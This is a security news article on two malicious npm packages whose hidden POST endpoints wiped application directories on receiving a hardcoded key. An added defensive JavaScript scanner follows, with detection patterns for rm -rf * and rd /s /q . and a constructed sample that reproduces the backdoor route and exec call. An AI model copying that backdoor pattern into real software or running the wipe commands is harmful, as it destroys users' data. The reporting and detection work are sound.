Malicious npm packages posing as legitimate utility libraries create destructive backdoor endpoints that allow remote deletion of application directories, Socket reported Thursday.

The packages, express-api-sync and system-health-sync-api, were published by npm user botsailer on June 3, 2025, and have since been removed by npm for containing malicious code.

Express-api-sync purported to provide a simple API for Express applications to sync data between two databases, but in reality had no legitimate function. Instead, the middleware the package integrated would register a hidden HTTP POST endpoint, "/api/this/that", that silently waited for a "kill command" from the attacker, according to Socket. Once this backdoor endpoint received a POST request carrying the hardcoded key "DEFAULT_123" in a header or body parameter, the malware called child_process.exec to run the Unix deletion command rm -rf *, wiping every file in the application's working directory.

While express-api-sync only affected Express applications running on Unix-like systems, system-health-sync-api was more complex and versatile, offering seemingly legitimate functionality alongside its hidden destructive features. The package had legitimate dependencies, including nodemailer and performance-now, and included a functional, benign health check endpoint that returned basic server status information. It also exposed several configuration options to users, adding to the air of legitimacy.

However, system-health-sync-api also created destructive backdoors: a primary endpoint (POST /_/system/health) and a backup (POST /_/sys/maintenance) for use in case the first endpoint is blocked.
As with express-api-sync, these endpoints triggered deletion commands after receiving a request from the attacker containing a specific key. The attacker used the email address anupm019@gmail[.]com as a communication channel to receive notifications from the malware, including any configuration changes made by the targeted developer. The hardcoded default key for the "kill command" request was "HelloWorld," but because configuration updates were relayed to that address, the attacker would learn of any new key set by the victim.

The package automatically detected the operating system (Windows or Unix-like) and the framework (Express, Fastify or the native HTTP module) to tailor its actions to the target application. It ran rm -rf * on Unix and rd /s /q . on Windows to wipe the application's files.

Before wiping files, the malware also gathered information about the target system, including hostname, IP address and a hash of the environment variables. The latter could serve as a "fingerprint" to "help attackers identify servers with specific configurations or detect when environment variables change," the Socket researchers stated.

While these short-lived packages received only about 300 downloads combined during the time they were available, their discovery highlights threats developers should be aware of when relying on npm utilities. Unlike the more common npm attacks focused on cryptocurrency and credential theft, these packages aimed to sabotage and disrupt developers through outright destruction.

The Socket team concluded that it expects to see more attacks targeting specific application frameworks such as Express and Fastify, as well as more advanced campaigns involving reconnaissance of entire company infrastructures.
Additionally, the "kill switches" planted by these packages could lie dormant for months or years before executing their destructive commands, allowing for coordinated attacks.
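The combination Socket describes (a hidden POST route, a hardcoded key compared against a header or body field, and child_process.exec running rm -rf * or rd /s /q .) is easy to flag with a static pass over a package's JavaScript before it is ever loaded. The scanner below is an added example written for this article; it is neither Socket's tooling nor the malware's code. The regular-expression indicators, the risk tiers and the two embedded source samples (one constructed to mimic the described behaviour, one benign health endpoint) are all assumptions made for illustration.

```javascript
// Added example: heuristic scan of npm package source for the indicator
// combination described above. Indicators and samples are constructed here,
// not taken from the malicious packages themselves.

const INDICATORS = [
  // child_process being pulled in at all is unusual for an HTTP "sync" helper
  { id: 'child_process', re: /require\(\s*['"]child_process['"]\s*\)|from\s+['"]child_process['"]/g },
  // any shell spawn primitive
  { id: 'shell_exec', re: /\b(?:exec|execSync|spawn|spawnSync)\s*\(/g },
  // route registration on an app/router; captures the path so it can be reported
  { id: 'route_registration', re: /\.(?:post|all|use|route)\s*\(\s*['"`](\/[^'"`]*)['"`]/g },
  // the Unix and Windows wipe commands named in the article, plus close variants
  { id: 'destructive_command', re: /rm\s+-rf\s+\*|rd\s+\/s\s+\/q\s+\.|rmdir\s+\/s\s+\/q|del\s+\/f\s+\/s\s+\/q/gi },
  // request field compared against a string literal: the "kill command" key check
  { id: 'hardcoded_key_check', re: /(?:headers|body|query)\s*(?:\[\s*['"][^'"]+['"]\s*\]|\.\w+)\s*===?\s*['"][^'"]+['"]/g },
];

// Scan one source string; returns [{ id, line, match, file }].
function scanSource(source, fileName = '<memory>') {
  const findings = [];
  for (const { id, re } of INDICATORS) {
    re.lastIndex = 0;
    let m;
    while ((m = re.exec(source)) !== null) {
      const line = source.slice(0, m.index).split('\n').length;
      findings.push({ id, line, match: m[1] ?? m[0], file: fileName });
    }
  }
  return findings;
}

// Rank the findings. Only the full chain (route + exec + wipe command) is
// treated as critical; a wipe command on its own is still high.
function assessRisk(findings) {
  const ids = new Set(findings.map((f) => f.id));
  const chain = ['route_registration', 'shell_exec', 'destructive_command'];
  if (chain.every((id) => ids.has(id))) return 'critical';
  if (ids.has('destructive_command')) return 'high';
  if (ids.has('shell_exec') && ids.has('route_registration')) return 'medium';
  return 'low';
}

// Walk a directory (for example node_modules/<pkg>) and scan every .js file.
// fs/path are required lazily so the in-memory samples need no filesystem.
function scanDirectory(dir) {
  const fs = require('fs');
  const path = require('path');
  const findings = [];
  for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
    const full = path.join(dir, entry.name);
    if (entry.isDirectory()) findings.push(...scanDirectory(full));
    else if (entry.isFile() && full.endsWith('.js')) {
      findings.push(...scanSource(fs.readFileSync(full, 'utf8'), full));
    }
  }
  return findings;
}

// Constructed sample mimicking the pattern in the article (not the real code).
const SAMPLE_MALICIOUS = `
const { exec } = require('child_process');
module.exports = function sync(app) {
  app.get('/health', (req, res) => res.json({ ok: true }));
  app.post('/_/system/health', (req, res) => {
    if (req.headers['x-key'] === 'HelloWorld' || req.body.key === 'HelloWorld') {
      exec(process.platform === 'win32' ? 'rd /s /q .' : 'rm -rf *');
    }
    res.sendStatus(204);
  });
};
`;

// Constructed benign sample: a health endpoint with no shell access.
const SAMPLE_BENIGN = `
module.exports = function health(app) {
  app.get('/health', (req, res) => res.json({ uptime: process.uptime() }));
};
`;

if (typeof require !== 'undefined' && require.main === module) {
  const target = process.argv[2];
  const findings = target ? scanDirectory(target) : scanSource(SAMPLE_MALICIOUS, 'sample.js');
  for (const f of findings) console.log(`${f.file}:${f.line} ${f.id} ${f.match}`);
  console.log('risk:', assessRisk(findings));
}

if (typeof module !== 'undefined') {
  module.exports = { INDICATORS, scanSource, assessRisk, scanDirectory, SAMPLE_MALICIOUS, SAMPLE_BENIGN };
}
```

Run it as `node scan.js node_modules/some-package` to walk a real install, or with no argument to see the constructed sample reported as critical with the hidden /_/system/health route and both wipe commands listed. The regexes are deliberately coarse: they will miss obfuscated or dynamically built commands, so treat a low score as "nothing obvious" rather than "clean", and pair the scan with an audit of which routes third-party middleware actually registers on the running app.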
